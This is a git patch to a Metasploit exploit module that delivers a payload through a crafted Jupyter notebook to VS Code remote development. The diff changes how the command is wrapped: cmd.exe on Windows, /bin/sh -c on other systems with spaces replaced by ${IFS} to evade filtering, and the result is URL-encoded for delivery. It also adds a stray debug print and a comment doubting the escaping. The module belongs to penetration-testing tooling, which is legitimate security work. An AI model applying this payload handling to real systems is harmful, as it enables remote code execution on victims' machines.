From 3da170a43c7f288fe9bc88fe325da488733acac3 Mon Sep 17 00:00:00 2001
From: h00die
Date: Fri, 22 Mar 2024 17:04:06 -0400
Subject: [PATCH] smcintyre-r7 recommendation for better payload handling
---
 .../multi/misc/vscode_ipynb_remote_dev_exec.rb | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb b/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
index 7911ae238e..d2bce191bb 100644
--- a/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
+++ b/modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec.rb
@@ -95,9 +95,16 @@ class MetasploitModule < Msf::Exploit::Remote
 def on_request_uri(cli, request)
 super unless request.uri.end_with? datastore['URIPATH']
- pload = %({"config":{"executable":"#{payload.encoded.split(' ')[0]}","args":"#{payload.encoded.split(' ')[1..].join(' ')}"}})
+ if target['Platform'] == 'win'
+ config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }
+ else
+ config = { 'executable' => '/bin/sh', 'args' => "-c #{payload.raw.gsub(' ', '${IFS}')}" }
+ end
+
+ pload = JSON.dump({ 'config' => config })
+ puts pload
- pload = CGI.escape(pload).gsub('+', '%20')
+ pload = CGI.escape(pload).gsub('+', '%20') # XXX not suure if this is needed or not
 ipynb = %|{ "cells": [